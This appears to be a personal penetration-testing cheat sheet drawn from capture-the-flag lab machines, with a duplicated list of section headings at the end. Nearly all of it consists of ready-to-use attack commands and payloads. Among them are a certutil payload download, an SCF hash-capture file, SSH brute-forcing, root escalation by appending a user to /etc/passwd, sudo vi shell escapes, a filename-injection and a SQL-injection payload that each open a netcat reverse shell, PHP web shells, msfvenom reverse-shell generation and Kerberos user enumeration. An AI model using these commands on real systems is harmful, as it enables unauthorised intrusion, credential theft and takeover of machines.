Download file from CLI

Linux: wget

Windows: certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe

SMB: smbclient [\\\\<ip>\\<sharename>](file://%3cip%3e/%3csharename%3e) -U <username>

Upgrade simple shell to interactive

python3 -c 'import pty; pty.spawn("/bin/bash")'

CTRL+Z

stty raw -echo;fg

export TERM=xterm-256color

(https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)

Decode/Encode JWT Tokens

https://jwt.io

share.scf

[Shell]

Command=2

IconFile=\\10.10.14.12\share\icon.ico

[Taskbar]

Command=ToggleDesktop

PowerShell Execution Policy

Get-ExecutionPolicy

Check Execution Policy

Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force

Set Execution Policy to Unrestricted so as to be able to Import Modules

LFI + PHP File Uploads

HTTP request header + body

POST /phpinfo.php HTTP/1.1

<TRUNCATED>

Content-Type: multipart/form-data; boundary=--Test

<TRUNCATED>

---Test

Content-Disposition: form-data; name="anything"; filename="file"

Content-Type: text/plain

Woohoooooooooooo

---Test

SSH Tunneling / Port Forwarding

ssh -D <port>

ssh -L<lport>:<rhost>:<rport>

Can use chisel as well

when hydra doesn’t work

patator ssh_login host=10.10.10.76 port=22022 user=FILE0 0=/usr/share/seclists/Usernames/Names/names.txt password=FILE1 1=/usr/share/seclists/Passwords/probable-v2-top1575.txt persistent=0

ssb -p 22022 -w /usr/share/seclists/Passwords/probable-v2-top1575.txt -v sunny@$IP

wget Qucickies

wget -i <localfile>

wget [http://yourip:port/file](http://yourip:port/file) -O outputfile

Using bash binary to privesc via suid

onuma@TartarSauce:/var/tmp/check/var/www/html$ ./bash -p

bash-4.3# id

uid=1000(onuma) gid=1000(onuma) euid=0(root) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)

But to get ID 0 and not just EUID 0, we can edit /etc/passwd to create a new root user with different name and password and switch to it.

bash-4.3# cp /etc/passwd /dev/shm

bash-4.3# openssl passwd -1 Password1

$1$TBJpMCue$Uzl02jOSnrQBz40ES6j611

bash-4.3# echo 'attacker:$1$TBJpMCue$Uzl02jOSnrQBz40ES6j611:0:0:attacker:/root:/bin/bash' >> /etc/passwd bash-4.3# su attacker

Password:

root@TartarSauce:/var/tmp/check/var/www/html# id

uid=0(root) gid=0(root) groups=0(root)

PHP Wrapper

=php://filter/convert.base64-encode/resource=login

DNS Zone Transfer

dig $axfr $IP $domain >> zonetransfer

aquatone - enumerate several known pages

cat hosts | aquatone

Sudo -l example

User www-data may run the following commands on swagshop:

(root) NOPASSWD: /usr/bin/vi /var/www/html/*

sudo vi /var/www/html/something

ESC :!/bin/bash

OR

sudo vi /var/www/html/test -c ':!/bin/bash'

Reverse Shell via Filename “poisoning”

Only works with script running to trigger the command

touch ';nc -c bash 10.10.14.12 4444;.php'

PHP - SQL Injection - URL encoded

URL-encoded PHP code (php echo shell_exec) to get shell using nc & bash

GET /room.php?cod=9999+union+select+1,2,3,(select+%27%3C?php+echo+shell_exec(%22nc+-e+/bin/bash+10.10.14.17+4444%22);?%3E%27),5,6,7+INTO+OUTFILE+%27/var/www/html/shell.php%27 HTTP/1.1

Find SUID Binaries

find / -perm -4000 -ls 2>/dev/null

PHP Request code

filename.php?a=whoami

<?php echo system($_REQUEST['a']); ?>

msfvenom Reverse Shell

[staged]

msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.17 LPORT=4444 > msf.exe

[stageless]

windows/shell/reverse_tcp

SMB Server

impacket-smbserver sharename .

copy [\\localhost\sharename\file](file://localhost/sharename/file)

Custom Password list via web crawl (cewl)

cewl -d 7 -m 8 -w cewl.out --with-numbers [http://fuse.fabricorp.local/papercut/logs/html/index.htm](http://fuse.fabricorp.local/papercut/logs/html/index.htm)

Custom Password list (hashcat)

hashcat --force custom -r /usr/share/hashcat/rules/best64.rule --stdout > pass

RPC

null authentication

rpcclient -U "" -N $IP

SMB Change Password

smbpasswd -U user -r $IP

Kerberos Pre-Auth Bruteforcing

~/scripts/kerbrute userenum --dc $IP -d domain USERLIST

dnstool - to add DNS records to AD via LDAP (located in ~/opt)

python3 [dnstool.py](http://dnstool.py/) -u 'domain\user' -p pass -r newdomain.domain -a add -t A -d LHOST RHOST

Simple PHP Shell (cmd)

"<?php SYSTEM($_REQUEST['cmd']); ?>

RDP into windows

xfreerdp /u:$USERNAME /p:$PASSWORD /cert:ignore /workarea /smart-sizing:1280x720 /v:$IP

copy files from remote to local via SSH (use scp)

scp $USERNAME@$IP:$FULLPATH .

nbtscan - 137/tcp/udp , 138/udp , 139/tcp

NBTscan is a program for scanning IP networks for NetBIOS name information. It sends NetBIOS status query to each address in supplied range and lists received information in human readable form.

nbtscan xxx.xxx.xxx.0/24

Download file from CLI#

Upgrade simple shell to interactive#

Decode/Encode JWT Tokens#

SMB Share SCF File Attack#

PowerShell Execution Policy#

LFI + PHP File Uploads#

SSH Tunneling / Port Forwarding#

SSH Login Brute Force (kinda broken tho)#

wget Qucickies#

Using bash binary to privesc via suid#

PHP Wrapper#

DNS Zone Transfer#

aquatone - enumerate several known pages#

Sudo -l example#

Reverse Shell via Filename “poisoning”#

PHP - SQL Injection - URL encoded#

Find SUID Binaries#

PHP Request code#

msfvenom Reverse Shell#

SMB Server#

Copy from local SMB Share#

Custom Password list via web crawl (cewl)#

Custom Password list (hashcat)#

RPC#

SMB Change Password#

Kerberos Pre-Auth Bruteforcing#

dnstool - to add DNS records to AD via LDAP (located in ~/opt)#

Simple PHP Shell (cmd)#

RDP into windows#

copy files from remote to local via SSH (use scp)#

nbtscan - 137/tcp/udp , 138/udp , 139/tcp#